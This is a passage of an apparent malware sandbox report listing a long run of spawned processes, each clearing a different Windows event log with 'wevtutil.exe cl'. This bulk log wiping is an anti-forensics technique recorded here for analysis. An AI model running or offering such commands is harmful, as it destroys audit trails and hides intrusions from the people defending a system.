        wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
        5⤵
        
        PID:1520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
        5⤵
        
        PID:308
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
        5⤵
        
        PID:1716
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
        5⤵
        
        PID:1880
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
        5⤵
        
        PID:1212
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
        5⤵
        
        PID:1520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
        5⤵
        
        PID:288
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
        5⤵
        
        PID:1716
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
        5⤵
        
        PID:1212
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Backup"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
        5⤵
        
        PID:288
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
        5⤵
        
        PID:1972
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
        5⤵
        
        PID:1940
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
        5⤵
        
        PID:1244
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
        5⤵
        
        PID:1716
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
        5⤵
        
        PID:1940
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
        5⤵
        
        PID:288
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
        5⤵
        
        PID:1212
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
        5⤵
        
        PID:1716
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
        5⤵
        
        PID:1244
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
        5⤵
        
        PID:308
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
        5⤵
        
        PID:1716
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
        5⤵
        
        PID:1356
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
        5⤵
        
        PID:1792
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
        5⤵
        
        PID:1356
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
        5⤵
        
        PID:1668
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
        5⤵
        
        PID:1168
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
        5⤵
        
        PID:1476
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
        5⤵
        
        PID:1520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
        5⤵
        
        PID:1356
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
        5⤵
        
        PID:1820
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Help/Operational"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
        5⤵
        
        PID:1668
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-International/Operational"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
        5⤵
        
        PID:1356
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
        5⤵
        
        PID:2020
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
        5⤵
        
        PID:1792
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
        5⤵
        
        PID:1824
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
